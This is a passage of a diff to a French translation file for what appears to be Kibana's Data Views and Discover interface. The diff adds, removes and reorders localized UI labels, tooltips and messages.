"Enregistrer votre session pour y revenir ultérieurement", "data.searchSessionIndicator.resultsLoadedIconAriaLabel": "Session de recherche terminée", "data.searchSessionIndicator.resultsLoadedIconTooltipText": "Session de recherche terminée", "data.searchSessionIndicator.resultsLoadedText": "Session de recherche terminée", - "data.searchSessionIndicator.resultsLoadedWhenText": "Terminé {when}", "data.searchSessionIndicator.saveButtonText": "Enregistrer la session", "data.searchSessionIndicator.viewSearchSessionsLinkText": "Gérer les sessions", "data.searchSessionName.ariaLabelText": "Nom de la session de recherche", @@ -2823,21 +1919,73 @@ "data.sessions.management.flyoutTitle": "Inspecter la session de recherche", "data.triggers.applyFilterDescription": "Lorsque le filtre Kibana est appliqué. Peut être un filtre simple ou un filtre de plage.", "data.triggers.applyFilterTitle": "Appliquer le filtre", + "dataViews.deprecations.scriptedFieldsMessage": "Vous avez {numberOfIndexPatternsWithScriptedFields} vues de données ({titlesPreview}...) qui utilisent des champs scriptés. Les champs scriptés sont déclassés et seront supprimés à l'avenir. Utilisez plutôt des champs d'exécution.", + "dataViews.fetchFieldErrorTitle": "Erreur lors de l'extraction des champs pour la vue de données {title} (ID : {id})", "dataViews.deprecations.scriptedFields.manualStepOneMessage": "Accédez à Gestion de la Suite > Kibana > Vues de données.", - "dataViews.deprecations.scriptedFields.manualStepTwoMessage": "Mettez à jour les vues de données {numberOfIndexPatternsWithScriptedFields} qui ont des champs scriptés pour qu’elles utilisent des champs d'exécution. Dans la plupart des cas, pour migrer des scripts existants, vous devrez remplacer \"return ;\" par \"emit();\". Vues de données avec au moins un champ scripté : {allTitles}", - "dataViews.deprecations.scriptedFieldsMessage": "Vous avez {numberOfIndexPatternsWithScriptedFields} vues de données ({titlesPreview}...) qui utilisent des champs scriptés. Les champs scriptés sont déclassés et seront supprimés à l'avenir. Utilisez plutôt des champs d'exécution.", + "dataViews.deprecations.scriptedFields.manualStepTwoMessage": "Mettez à jour les vues de données {numberOfIndexPatternsWithScriptedFields} qui ont des champs scriptés pour qu’elles utilisent des champs d'exécution. Dans la plupart des cas, pour migrer des scripts existants, vous devrez remplacer \"return ;\" par \"emit();\". Vues de données avec au moins un champ scripté : {allTitles}", "dataViews.deprecations.scriptedFieldsTitle": "Vues de données utilisant des champs scriptés trouvées", - "dataViews.fetchFieldErrorTitle": "Erreur lors de l'extraction des champs pour la vue de données {title} (ID : {id})", "dataViews.functions.dataViewLoad.help": "Charge une vue de données", "dataViews.functions.dataViewLoad.id.help": "ID de vue de données à charger", "dataViews.indexPatternLoad.error.kibanaRequest": "Une requête Kibana est nécessaire pour exécuter cette recherche sur le serveur. Veuillez fournir un objet de requête pour les paramètres d'exécution de l'expression.", - "dataViews.unableWriteLabel": "Impossible d'écrire la vue de données ! Actualisez la page pour obtenir la dernière version de cette vue de données.", - "devTools.badge.betaLabel": "Bêta", - "devTools.badge.betaTooltipText": "Cette fonctionnalité pourra considérablement changer dans les futures versions", - "devTools.badge.readOnly.text": "Lecture seule", - "devTools.badge.readOnly.tooltip": "Enregistrement impossible", - "devTools.breadcrumb.homeLabel": "Outils de développement", - "devTools.devToolsTitle": "Outils de développement", + "dataViews.unableWriteLabel": "Impossible d'écrire la vue de données ! Actualisez la page pour obtenir la dernière version de cette vue de données.", + "discover.advancedSettings.disableDocumentExplorerDescription": "Désactivez cette option pour utiliser le nouveau {documentExplorerDocs} au lieu de la vue classique. l'explorateur de documents offre un meilleur tri des données, des colonnes redimensionnables et une vue en plein écran.", + "discover.advancedSettings.discover.showFieldStatisticsDescription": "Activez le {fieldStatisticsDocs} pour afficher des détails tels que les valeurs minimale et maximale d'un champ numérique ou une carte d'un champ géographique. Cette fonctionnalité est en version bêta et susceptible d'être modifiée.", + "discover.advancedSettings.discover.showMultifieldsDescription": "Détermine si les {multiFields} doivent s'afficher dans la fenêtre de document étendue. Dans la plupart des cas, les champs multiples sont les mêmes que les champs d'origine. Cette option est uniquement disponible lorsque le paramètre ''searchFieldsFromSource'' est désactivé.", + "discover.advancedSettings.enableSQLDescription": "{technicalPreviewLabel} Cette fonctionnalité en préversion est encore très expérimentale, ne pas s'y fier pour les recherches ni pour les tableaux de bord en production. Ce paramètre désactive SQL comme langage de requête à base de texte dans Discover. Si vous avez des commentaires sur cette expérience, contactez-nous via {link}", + "discover.bucketIntervalTooltip": "Cet intervalle crée {bucketsDescription} pour permettre l’affichage dans la plage temporelle sélectionnée, il a donc été redimensionné vers {bucketIntervalDescription}.", + "discover.context.contextOfTitle": "Les documents relatifs à #{anchorId}", + "discover.context.newerDocumentsWarning": "Seuls {docCount} documents plus récents que le document ancré ont été trouvés.", + "discover.context.olderDocumentsWarning": "Seuls {docCount} documents plus anciens que le document ancré ont été trouvés.", + "discover.context.pageTitle": "Les documents relatifs à #{anchorId}", + "discover.contextViewRoute.errorMessage": "Aucune donnée correspondante pour l'ID {dataViewId}", + "discover.discoverError.missingQueryParamsError": "La chaîne de requête URL est manquante {missingParamsList}.", + "discover.doc.pageTitle": "Document unique - #{id}", + "discover.doc.somethingWentWrongDescription": "Index {indexName} manquant.", + "discover.docExplorerCallout.bodyMessage": "Triez, sélectionnez et comparez rapidement les données, redimensionnez les colonnes et affichez les documents en plein écran grâce à l'{documentExplorer}.", + "discover.docTable.limitedSearchResultLabel": "Limité à {resultCount} résultats. Veuillez affiner votre recherche.", + "discover.docTable.rowsPerPage": "Lignes par page : {pageSize}", + "discover.docTable.tableHeader.moveColumnLeftButtonAriaLabel": "Déplacer la colonne {columnName} vers la gauche", + "discover.docTable.tableHeader.moveColumnRightButtonAriaLabel": "Déplacer la colonne {columnName} vers la droite", + "discover.docTable.tableHeader.removeColumnButtonAriaLabel": "Supprimer la colonne {columnName}", + "discover.docTable.tableHeader.sortByColumnAscendingAriaLabel": "Trier la colonne {columnName} par ordre croissant", + "discover.docTable.tableHeader.sortByColumnDescendingAriaLabel": "Trier la colonne {columnName} par ordre décroissant", + "discover.docTable.tableHeader.sortByColumnUnsortedAriaLabel": "Arrêter de trier la colonne {columnName}", + "discover.docTable.tableHeader.timeFieldIconTooltipAriaLabel": "{timeFieldName} : ce champ représente l'heure à laquelle les événements se sont produits.", + "discover.docTable.totalDocuments": "{totalDocuments} documents", + "discover.dscTour.stepAddFields.description": "Cliquez sur {plusIcon} pour ajouter les champs qui vous intéressent.", + "discover.dscTour.stepExpand.description": "Cliquez sur l'{expandIcon} pour afficher, comparer et filtrer les documents.", + "discover.field.title": "{fieldName} ({fieldDisplayName})", + "discover.fieldChooser.detailViews.existsInRecordsText": "Existe dans {value} / {totalValue} enregistrements", + "discover.fieldChooser.detailViews.filterOutValueButtonAriaLabel": "Exclure le {field} : \"{value}\"", + "discover.fieldChooser.detailViews.filterValueButtonAriaLabel": "Filtrer sur le {field} : \"{value}\"", + "discover.fieldChooser.detailViews.valueOfRecordsText": "{value}/{totalValue} enregistrements", + "discover.fieldChooser.discoverField.addButtonAriaLabel": "Ajouter {field} au tableau", + "discover.fieldChooser.discoverField.removeButtonAriaLabel": "Supprimer {field} du tableau", + "discover.fieldChooser.fieldCalculator.fieldIsNotPresentInDocumentsErrorMessage": "Ce champ est présent dans votre mapping Elasticsearch, mais pas dans les {hitsLength} documents affichés dans le tableau des documents. Cependant, vous pouvez toujours le consulter ou effectuer une recherche dessus.", + "discover.fieldChooser.filter.fieldSelectorLabel": "Sélection des options du filtre {id}", + "discover.fieldNameDescription.dateRangeField": "Range of {dateFieldTypeLink} values. {viewSupportedDateFormatsLink}", + "discover.fieldNameDescription.versionField": "Versions des logiciels. Prend en charge les règles de priorité de {SemanticVersioningLink}.", + "discover.grid.copyClipboardButtonTitle": "Copier la valeur de {column}", + "discover.grid.copyColumnValuesToClipboard.toastTitle": "Valeurs de la colonne \"{column}\" copiées dans le presse-papiers", + "discover.grid.filterForAria": "Filtrer sur cette {value}", + "discover.grid.filterOutAria": "Exclure cette {value}", + "discover.gridSampleSize.description": "Vous voyez les {sampleSize} premiers échantillons de documents qui correspondent à votre recherche. Pour modifier cette valeur, accédez à {advancedSettingsLink}.", + "discover.histogramTimeRangeIntervalDescription": "(intervalle : {value})", + "discover.hitsPluralTitle": "{formattedHits} {hits, plural, one {résultat} other {résultats}}", + "discover.howToSeeOtherMatchingDocumentsDescription": "Voici les {sampleSize} premiers documents correspondant à votre recherche. Veuillez affiner celle-ci pour en voir plus.", + "discover.noMatchRoute.bannerText": "L'application Discover ne reconnaît pas cet itinéraire : {route}", + "discover.noResults.tryRemovingOrDisablingFilters": "Essayez de supprimer ou de {disablingFiltersLink}.", + "discover.pageTitleWithSavedSearch": "Discover - {savedSearchTitle}", + "discover.partialHits": "≥ {formattedHits} {hits, plural, one {résultat} other {résultats}}", + "discover.savedSearchAliasMatchRedirect.objectNoun": "Recherche {savedSearch}", + "discover.savedSearchURLConflictCallout.objectNoun": "Recherche {savedSearch}", + "discover.searchGenerationWithDescription": "Tableau généré par la recherche {searchTitle}", + "discover.searchGenerationWithDescriptionGrid": "Tableau généré par la recherche {searchTitle} ({searchDescription})", + "discover.selectedDocumentsNumber": "{nr} documents sélectionnés", + "discover.timeIntervalWithValue": "Intervalle de temps : {timeInterval}", + "discover.topNav.optionsPopover.currentViewMode": "{viewModeLabel} : {currentViewMode}", + "discover.utils.formatHit.moreFields": "et {count} {count, plural, one {autre champ} other {autres champs}}", + "discover.valueIsNotConfiguredDataViewIDWarningTitle": "{stateVal} n'est pas un ID de vue de données configuré", "discover.advancedSettings.context.defaultSizeText": "Le nombre d'entrées connexes à afficher dans la vue contextuelle", "discover.advancedSettings.context.defaultSizeTitle": "Taille de contexte", "discover.advancedSettings.context.sizeStepText": "L’incrément duquel augmenter ou diminuer la taille de contexte", @@ -2847,7 +1995,6 @@ "discover.advancedSettings.defaultColumnsText": "Les colonnes affichées par défaut dans l'application Discover. Si elles sont vides, un résumé du document s’affiche.", "discover.advancedSettings.defaultColumnsTitle": "Colonnes par défaut", "discover.advancedSettings.disableDocumentExplorer": "Explorateur de documents ou vue classique", - "discover.advancedSettings.disableDocumentExplorerDescription": "Désactivez cette option pour utiliser le nouveau {documentExplorerDocs} au lieu de la vue classique. l'explorateur de documents offre un meilleur tri des données, des colonnes redimensionnables et une vue en plein écran.", "discover.advancedSettings.discover.fieldNameDescription.versionFieldLinkText": "Gestion sémantique des versions", "discover.advancedSettings.discover.fieldStatisticsLinkText": "Vue des statistiques de champ", "discover.advancedSettings.discover.modifyColumnsOnSwitchText": "Supprimez les colonnes qui ne sont pas disponibles dans la nouvelle vue de données.", @@ -2856,40 +2003,43 @@ "discover.advancedSettings.discover.readFieldsFromSource": "Lire les champs depuis _source", "discover.advancedSettings.discover.readFieldsFromSourceDescription": "Lorsque cette option est activée, les documents sont chargés directement depuis ''_source''. Elle sera bientôt déclassée. Lorsqu'elle est désactivée, les champs sont extraits via la nouvelle API de champ du service de recherche de haut niveau.", "discover.advancedSettings.discover.showFieldStatistics": "Afficher les statistiques de champ", - "discover.advancedSettings.discover.showFieldStatisticsDescription": "Activez le {fieldStatisticsDocs} pour afficher des détails tels que les valeurs minimale et maximale d'un champ numérique ou une carte d'un champ géographique. Cette fonctionnalité est en version bêta et susceptible d'être modifiée.", "discover.advancedSettings.discover.showMultifields": "Afficher les champs multiples", - "discover.advancedSettings.discover.showMultifieldsDescription": "Détermine si les {multiFields} doivent s'afficher dans la fenêtre de document étendue. Dans la plupart des cas, les champs multiples sont les mêmes que les champs d'origine. Cette option est uniquement disponible lorsque le paramètre ''searchFieldsFromSource'' est désactivé.", "discover.advancedSettings.docTableHideTimeColumnText": "Permet de masquer la colonne ''Time'' dans Discover et dans toutes les recherches enregistrées des tableaux de bord.", "discover.advancedSettings.docTableHideTimeColumnTitle": "Masquer la colonne ''Time''", "discover.advancedSettings.documentExplorerLinkText": "Explorateur de documents", - "discover.advancedSettings.fieldsPopularLimitText": "Les N champs les plus populaires à afficher", + "discover.advancedSettings.enableSQL.discussLinkText": "discuss.elastic.co/c/elastic-stack/kibana", + "discover.advancedSettings.enableSQLTitle": "Activer SQL", + "discover.advancedSettings.fieldsPopularLimitText": "Les N champs les plus populaires à afficher", "discover.advancedSettings.fieldsPopularLimitTitle": "Limite de champs populaires", "discover.advancedSettings.maxDocFieldsDisplayedText": "Le nombre maximal de champs renvoyés dans le résumé du document", "discover.advancedSettings.maxDocFieldsDisplayedTitle": "Nombre maximal de champs de document affichés", - "discover.advancedSettings.params.maxCellHeightText": "La hauteur maximale qu'une cellule de tableau peut atteindre. Définissez ce paramètre sur 0 pour désactiver la troncation.", + "discover.advancedSettings.params.maxCellHeightText": "La hauteur maximale qu'une cellule de tableau peut atteindre. Définissez ce paramètre sur 0 pour désactiver la troncation.", "discover.advancedSettings.params.maxCellHeightTitle": "Hauteur de cellule maximale dans le tableau classique", "discover.advancedSettings.params.rowHeightText": "Nombre de sous-lignes à autoriser dans une ligne. La valeur -1 ajuste automatiquement la hauteur de ligne selon le contenu. La valeur 0 affiche le contenu en une seule ligne.", "discover.advancedSettings.params.rowHeightTitle": "Hauteur de ligne dans l'explorateur de documents", + "discover.advancedSettings.sampleRowsPerPageText": "Limite le nombre de lignes par page dans le tableau de documents.", + "discover.advancedSettings.sampleRowsPerPageTitle": "Lignes par page", + "discover.advancedSettings.sampleSizeText": "Définit le nombre maximum de lignes pour l'ensemble du tableau de documents.", + "discover.advancedSettings.sampleSizeTitle": "Lignes max. par tableau", "discover.advancedSettings.searchOnPageLoadText": "Détermine si une recherche est exécutée lors du premier chargement de Discover. Ce paramètre n'a pas d'effet lors du chargement d’une recherche enregistrée.", "discover.advancedSettings.searchOnPageLoadTitle": "Recherche au chargement de la page", "discover.advancedSettings.sortDefaultOrderText": "Détermine le sens de tri par défaut pour les vues de données temporelles dans l'application Discover.", "discover.advancedSettings.sortDefaultOrderTitle": "Sens de tri par défaut", "discover.advancedSettings.sortOrderAsc": "Croissant", "discover.advancedSettings.sortOrderDesc": "Décroissant", + "discover.advancedSettings.technicalPreviewLabel": "version d'évaluation technique", "discover.alerts.createSearchThreshold": "Créer une règle de seuil de recherche", "discover.alerts.manageRulesAndConnectors": "Gérer les règles et les connecteurs", "discover.alerts.missedTimeFieldToolTip": "La vue de données ne possède pas de champ temporel.", "discover.backToTopLinkText": "Revenir en haut de la page.", "discover.badge.readOnly.text": "Lecture seule", "discover.badge.readOnly.tooltip": "Impossible d’enregistrer les recherches", - "discover.bucketIntervalTooltip": "Cet intervalle crée {bucketsDescription} pour permettre l’affichage dans la plage temporelle sélectionnée, il a donc été redimensionné vers {bucketIntervalDescription}.", "discover.bucketIntervalTooltip.tooLargeBucketsText": "des compartiments trop volumineux", "discover.bucketIntervalTooltip.tooManyBucketsText": "un trop grand nombre de compartiments", "discover.chartOptions": "Options de graphique", "discover.chartOptionsButton": "Options de graphique", "discover.clearSelection": "Effacer la sélection", "discover.context.breadcrumb": "Documents relatifs", - "discover.context.contextOfTitle": "Les documents relatifs à #{anchorId}", "discover.context.failedToLoadAnchorDocumentDescription": "Échec de chargement du document ancré", "discover.context.failedToLoadAnchorDocumentErrorDescription": "Le document ancré n’a pas pu être chargé.", "discover.context.invalidTieBreakerFiledSetting": "Paramètre de champ de départage non valide", @@ -2897,32 +2047,27 @@ "discover.context.loadingDescription": "Chargement...", "discover.context.newerDocumentsAriaLabel": "Nombre de documents plus récents", "discover.context.newerDocumentsDescription": "documents plus récents", - "discover.context.newerDocumentsWarning": "Seuls {docCount} documents plus récents que le document ancré ont été trouvés.", "discover.context.newerDocumentsWarningZero": "Aucun document plus récent que le document ancré n'a été trouvé.", "discover.context.olderDocumentsAriaLabel": "Nombre de documents plus anciens", "discover.context.olderDocumentsDescription": "documents plus anciens", - "discover.context.olderDocumentsWarning": "Seuls {docCount} documents plus anciens que le document ancré ont été trouvés.", "discover.context.olderDocumentsWarningZero": "Aucun document plus ancien que le document ancré n'a été trouvé.", "discover.context.reloadPageDescription.reloadOrVisitTextMessage": "Veuillez recharger le document ou revenir à la liste pour sélectionner un document ancré valide.", "discover.context.unableToLoadAnchorDocumentDescription": "Impossible de charger le document ancré", "discover.context.unableToLoadDocumentDescription": "Impossible de charger les documents", + "discover.contextViewRoute.errorTitle": "Une erreur s'est produite", "discover.controlColumnHeader": "Colonne de commande", "discover.copyToClipboardJSON": "Copier les documents dans le presse-papiers (JSON)", "discover.discoverBreadcrumbTitle": "Discover", "discover.discoverDefaultSearchSessionName": "Discover", "discover.discoverDescription": "Explorez vos données de manière interactive en interrogeant et en filtrant des documents bruts.", - "discover.discoverError.missingQueryParamsError": "La chaîne de requête URL est manquante {missingParamsList}.", "discover.discoverError.title": "Chargement de cette page impossible", "discover.discoverSubtitle": "Recherchez et obtenez des informations.", "discover.discoverTitle": "Discover", "discover.doc.couldNotFindDocumentsDescription": "Aucun document ne correspond à cet ID.", "discover.doc.failedToExecuteQueryDescription": "Impossible d'exécuter la recherche", - "discover.doc.failedToLocateDataView": "Aucune vue de données ne correspond à l'ID {dataViewId}.", "discover.doc.failedToLocateDocumentDescription": "Document introuvable", "discover.doc.loadingDescription": "Chargement…", - "discover.doc.somethingWentWrongDescription": "Index {indexName} manquant.", "discover.doc.somethingWentWrongDescriptionAddon": "Veuillez vérifier que cet index existe.", - "discover.docExplorerCallout.bodyMessage": "Triez, sélectionnez et comparez rapidement les données, redimensionnez les colonnes et affichez les documents en plein écran grâce à l'{documentExplorer}.", "discover.docExplorerCallout.closeButtonAriaLabel": "Fermer", "discover.docExplorerCallout.documentExplorer": "Explorateur de documents", "discover.docExplorerCallout.headerMessage": "Une meilleure façon d'explorer", @@ -2934,20 +2079,12 @@ "discover.docExplorerUpdateCallout.takeTourButtonLabel": "Découvrir", "discover.docExplorerUpdateCallout.title": "Optimiser l'affichage de vos résultats de recherche", "discover.docTable.documentsNavigation": "Navigation dans les documents", - "discover.docTable.limitedSearchResultLabel": "Limité à {resultCount} résultats. Veuillez affiner votre recherche.", - "discover.docTable.noResultsTitle": "Aucun résultat trouvé.", + "discover.docTable.noResultsTitle": "Résultat introuvable", "discover.docTable.rows": "lignes", - "discover.docTable.rowsPerPage": "Lignes par page : {pageSize}", "discover.docTable.tableHeader.documentHeader": "Document", - "discover.docTable.tableHeader.moveColumnLeftButtonAriaLabel": "Déplacer la colonne {columnName} vers la gauche", "discover.docTable.tableHeader.moveColumnLeftButtonTooltip": "Déplacer la colonne vers la gauche", - "discover.docTable.tableHeader.moveColumnRightButtonAriaLabel": "Déplacer la colonne {columnName} vers la droite", "discover.docTable.tableHeader.moveColumnRightButtonTooltip": "Déplacer la colonne vers la droite", - "discover.docTable.tableHeader.removeColumnButtonAriaLabel": "Supprimer la colonne {columnName}", "discover.docTable.tableHeader.removeColumnButtonTooltip": "Supprimer la colonne", - "discover.docTable.tableHeader.sortByColumnAscendingAriaLabel": "Trier la colonne {columnName} par ordre croissant", - "discover.docTable.tableHeader.sortByColumnDescendingAriaLabel": "Trier la colonne {columnName} par ordre décroissant", - "discover.docTable.tableHeader.sortByColumnUnsortedAriaLabel": "Arrêter de trier la colonne {columnName}", "discover.docTable.tableHeader.timeFieldIconTooltip": "Ce champ représente l'heure à laquelle les événements se sont produits.", "discover.docTable.tableRow.detailHeading": "Document développé", "discover.docTable.tableRow.filterForValueButtonAriaLabel": "Filtrer sur la valeur", @@ -2957,7 +2094,6 @@ "discover.docTable.tableRow.toggleRowDetailsButtonAriaLabel": "Afficher/Masquer les détails de la ligne", "discover.docTable.tableRow.viewSingleDocumentLinkText": "Afficher un seul document", "discover.docTable.tableRow.viewSurroundingDocumentsLinkText": "Afficher les documents alentour", - "discover.docTable.totalDocuments": "{totalDocuments} documents", "discover.documentsAriaLabel": "Documents", "discover.docView.table.actions.label": "Actions", "discover.docView.table.actions.open": "Actions ouvertes", @@ -2989,13 +2125,11 @@ "discover.docViews.table.unindexedFieldsCanNotBeSearchedTooltip": "Les champs non indexés ou les valeurs ignorées ne peuvent pas être recherchés", "discover.docViews.table.unpinFieldAriaLabel": "Désépingler le champ", "discover.docViews.table.unpinFieldLabel": "Désépingler le champ", - "discover.dscTour.stepAddFields.description": "Cliquez sur {plusIcon} pour ajouter les champs qui vous intéressent.", "discover.dscTour.stepAddFields.imageAltText": "Dans la liste Champs disponibles, cliquez sur l'icône Plus pour afficher/masquer un champ dans le tableau de documents.", "discover.dscTour.stepAddFields.title": "Ajouter des champs dans le tableau", "discover.dscTour.stepChangeRowHeight.description": "Ajustez le nombre de lignes pour adapter la taille au contenu.", "discover.dscTour.stepChangeRowHeight.imageAltText": "Cliquez sur l'icône d'options d'affichage pour ajuster la hauteur de ligne afin d'adapter la taille au contenu.", "discover.dscTour.stepChangeRowHeight.title": "Modifier la hauteur de ligne", - "discover.dscTour.stepExpand.description": "Cliquez sur l'{expandIcon} pour afficher, comparer et filtrer les documents.", "discover.dscTour.stepExpand.expandIconAriaLabel": "icône de développement", "discover.dscTour.stepExpand.imageAltText": "Cliquez sur l'icône de développement pour inspecter et filtrer les champs du document et afficher le document en contexte.", "discover.dscTour.stepExpand.title": "Développer les documents", @@ -3012,34 +2146,25 @@ "discover.errorLoadingChart": "Erreur lors du chargement du graphique", "discover.field.mappingConflict": "Ce champ est défini avec plusieurs types (chaîne, entier, etc.) dans les différents index qui correspondent à ce modèle. Vous pouvez toujours utiliser ce champ conflictuel, mais il sera indisponible pour les fonctions qui nécessitent que Kibana en connaisse le type. Pour corriger ce problème, vous devrez réindexer vos données.", "discover.field.mappingConflict.title": "Conflit de mapping", - "discover.field.title": "{fieldName} ({fieldDisplayName})", "discover.fieldChooser.addField.label": "Ajouter un champ", "discover.fieldChooser.detailViews.emptyStringText": "Chaîne vide", - "discover.fieldChooser.detailViews.existsInRecordsText": "Existe dans {value} / {totalValue} enregistrements", - "discover.fieldChooser.detailViews.filterOutValueButtonAriaLabel": "Exclure le {field} : \"{value}\"", - "discover.fieldChooser.detailViews.filterValueButtonAriaLabel": "Filtrer sur le {field} : \"{value}\"", - "discover.fieldChooser.detailViews.valueOfRecordsText": "{value}/{totalValue} enregistrements", "discover.fieldChooser.discoverField.actions": "Actions", - "discover.fieldChooser.discoverField.addButtonAriaLabel": "Ajouter {field} au tableau", "discover.fieldChooser.discoverField.addFieldTooltip": "Ajouter le champ en tant que colonne", "discover.fieldChooser.discoverField.deleteFieldLabel": "Supprimer le champ de la vue de données", "discover.fieldChooser.discoverField.editFieldLabel": "Modifier le champ de la vue de données", - "discover.fieldChooser.discoverField.fieldTopValuesLabel": "Top 5 des valeurs", + "discover.fieldChooser.discoverField.fieldTopValuesLabel": "Top 5 des valeurs", "discover.fieldChooser.discoverField.multiField": "champ multiple", "discover.fieldChooser.discoverField.multiFields": "Champs multiples", "discover.fieldChooser.discoverField.multiFieldTooltipContent": "Les champs multiples peuvent avoir plusieurs valeurs.", "discover.fieldChooser.discoverField.name": "Champ", - "discover.fieldChooser.discoverField.removeButtonAriaLabel": "Supprimer {field} du tableau", "discover.fieldChooser.discoverField.removeFieldTooltip": "Supprimer le champ du tableau", "discover.fieldChooser.discoverField.value": "Valeur", "discover.fieldChooser.fieldCalculator.analysisIsNotAvailableForGeoFieldsErrorMessage": "L'analyse n'est pas disponible pour les champs géométriques.", "discover.fieldChooser.fieldCalculator.analysisIsNotAvailableForObjectFieldsErrorMessage": "L'analyse n'est pas disponible pour les champs d'objet.", - "discover.fieldChooser.fieldCalculator.fieldIsNotPresentInDocumentsErrorMessage": "Ce champ est présent dans votre mapping Elasticsearch, mais pas dans les {hitsLength} documents affichés dans le tableau des documents. Cependant, vous pouvez toujours le consulter ou effectuer une recherche dessus.", "discover.fieldChooser.fieldFilterButtonLabel": "Filtrer par type", "discover.fieldChooser.fieldsMobileButtonLabel": "Champs", "discover.fieldChooser.filter.aggregatableLabel": "Regroupable", "discover.fieldChooser.filter.availableFieldsTitle": "Champs disponibles", - "discover.fieldChooser.filter.fieldSelectorLabel": "Sélection des options du filtre {id}", "discover.fieldChooser.filter.filterByTypeLabel": "Filtrer par type", "discover.fieldChooser.filter.hideEmptyFieldsLabel": "Masquer les champs vides", "discover.fieldChooser.filter.indexAndFieldsSectionAriaLabel": "Index et champs", @@ -3058,12 +2183,12 @@ "discover.fieldList.flyoutBackIcon": "Retour", "discover.fieldList.flyoutHeading": "Liste des champs", "discover.fieldNameDescription.booleanField": "Valeurs vraies ou fausses.", - "discover.fieldNameDescription.conflictField": "Le champ possède des valeurs de différents types. Corrigez le problème dans Gestion > Vues de données.", + "discover.fieldNameDescription.conflictField": "Le champ possède des valeurs de différents types. Corrigez le problème dans Gestion > Vues de données.", "discover.fieldNameDescription.dateField": "Chaîne de date ou nombre de secondes ou de millisecondes depuis 1/1/1970.", - "discover.fieldNameDescription.dateRangeField": "Range of {dateFieldTypeLink} values. {viewSupportedDateFormatsLink}", "discover.fieldNameDescription.dateRangeFieldLinkText": "date", "discover.fieldNameDescription.geoPointField": "Points de latitude et de longitude.", "discover.fieldNameDescription.geoShapeField": "Formes complexes, telles que des polygones.", + "discover.fieldNameDescription.histogramField": "Valeurs numériques pré-agrégées sous forme d'histogramme.", "discover.fieldNameDescription.ipAddressField": "Adresses IPv4 et IPv6.", "discover.fieldNameDescription.ipAddressRangeField": "Plage de valeurs IP prenant en charge les adresses IPv4 ou IPv6 (ou les 2).", "discover.fieldNameDescription.keywordField": "Contenu structuré tel qu'un ID, une adresse e-mail, un nom d'hôte, un code de statut, ou une balise.", @@ -3073,14 +2198,16 @@ "discover.fieldNameDescription.stringField": "Texte intégral tel que le corps d'un e-mail ou la description d'un produit.", "discover.fieldNameDescription.textField": "Texte intégral tel que le corps d'un e-mail ou la description d'un produit.", "discover.fieldNameDescription.unknownField": "Champ inconnu", - "discover.fieldNameDescription.versionField": "Versions des logiciels. Prend en charge les règles de priorité de {SemanticVersioningLink}.", "discover.fieldNameDescription.viewSupportedDateFormatsLinkText": "Affichez les formats de date pris en charge.", "discover.fieldNameIcons.booleanAriaLabel": "Champ booléen", "discover.fieldNameIcons.conflictFieldAriaLabel": "Champ conflictuel", "discover.fieldNameIcons.dateFieldAriaLabel": "Champ de date", + "discover.fieldNameIcons.dateRangeFieldAriaLabel": "Champ de plage de dates", "discover.fieldNameIcons.geoPointFieldAriaLabel": "Champ de point géographique", "discover.fieldNameIcons.geoShapeFieldAriaLabel": "Champ de forme géométrique", - "discover.fieldNameIcons.ipAddressFieldAriaLabel": "Champ d'adresse IP", + "discover.fieldNameIcons.histogramFieldAriaLabel": "Champ d'histogramme", + "discover.fieldNameIcons.ipAddressFieldAriaLabel": "Champ d'adresse IP", + "discover.fieldNameIcons.ipRangeFieldAriaLabel": "Champ de plage d’IP", "discover.fieldNameIcons.keywordFieldAriaLabel": "Champ de mot-clé", "discover.fieldNameIcons.murmur3FieldAriaLabel": "Champ Murmur3", "discover.fieldNameIcons.nestedFieldAriaLabel": "Champ imbriqué", @@ -3091,6 +2218,8 @@ "discover.fieldNameIcons.unknownFieldAriaLabel": "Champ inconnu", "discover.fieldNameIcons.versionFieldAriaLabel": "Champ de version", "discover.fieldTypesPopover.buttonAriaLabel": "Aide sur le type de filtre", + "discover.fieldTypesPopover.dataTypeColumnTitle": "Type de données", + "discover.fieldTypesPopover.descriptionColumnTitle": "Description", "discover.fieldTypesPopover.fieldTypesDocLinkLabel": "types de champ", "discover.fieldTypesPopover.iconTitle": "Aide sur le type de filtre", "discover.fieldTypesPopover.learnMoreText": "Découvrez", @@ -3098,12 +2227,16 @@ "discover.goToDiscoverMainViewButtonText": "Accédez à la vue principale de Discover", "discover.grid.closePopover": "Fermer la fenêtre contextuelle", "discover.grid.copyClipboardButton": "Copier dans le presse-papiers", - "discover.grid.copyClipboardButtonTitle": "Copier la valeur de {column}", + "discover.grid.copyColumnNameToClipboard.toastTitle": "Copié dans le presse-papiers", + "discover.grid.copyColumnNameToClipBoardButton": "Copier le nom", + "discover.grid.copyColumnValuesToClipBoardButton": "Copier la colonne", + "discover.grid.copyEscapedValueWithFormulasToClipboardWarningText": "Les valeurs peuvent contenir des formules avec échappement.", + "discover.grid.copyFailedErrorText": "Impossible de copier dans le presse-papiers avec ce navigateur", + "discover.grid.copyValueToClipboard.toastTitle": "Copié dans le presse-papiers", "discover.grid.documentHeader": "Document", + "discover.grid.editFieldButton": "Modifier le champ de la vue de données", "discover.grid.filterFor": "Filtrer sur", - "discover.grid.filterForAria": "Filtrer sur cette {value}", "discover.grid.filterOut": "Exclure", - "discover.grid.filterOutAria": "Exclure cette {value}", "discover.grid.flyout.documentNavigation": "Navigation dans le document", "discover.grid.flyout.toastColumnAdded": "La colonne \"{columnName}\" a été ajoutée.", "discover.grid.flyout.toastColumnRemoved": "La colonne \"{columnName}\" a été supprimée.", @@ -3113,23 +2246,21 @@ "discover.grid.tableRow.viewSingleDocumentLinkTextSimple": "Document unique", "discover.grid.tableRow.viewSurroundingDocumentsHover": "Inspectez des documents qui ont été créés avant et après ce document. Seuls les filtres épinglés restent actifs dans la vue Documents relatifs.", "discover.grid.tableRow.viewSurroundingDocumentsLinkTextSimple": "Documents relatifs", - "discover.grid.tableRow.viewText": "Afficher :", + "discover.grid.tableRow.viewText": "Afficher :", "discover.grid.viewDoc": "Afficher/Masquer les détails de la boîte de dialogue", - "discover.helpMenu.appName": "Discover", + "discover.gridSampleSize.advancedSettingsLinkLabel": "Paramètres avancés", + "discover.helpMenu.appName": "Découverte", "discover.hideChart": "Masquer le graphique", "discover.histogramOfFoundDocumentsAriaLabel": "Histogramme des documents détectés", "discover.histogramTimeRangeIntervalAuto": "Auto", - "discover.histogramTimeRangeIntervalDescription": "(intervalle : {value})", "discover.hitCountSpinnerAriaLabel": "Nombre final de résultats toujours en chargement", - "discover.hitsPluralTitle": "{formattedHits} {hits, plural, one {résultat} other {résultats}}", - 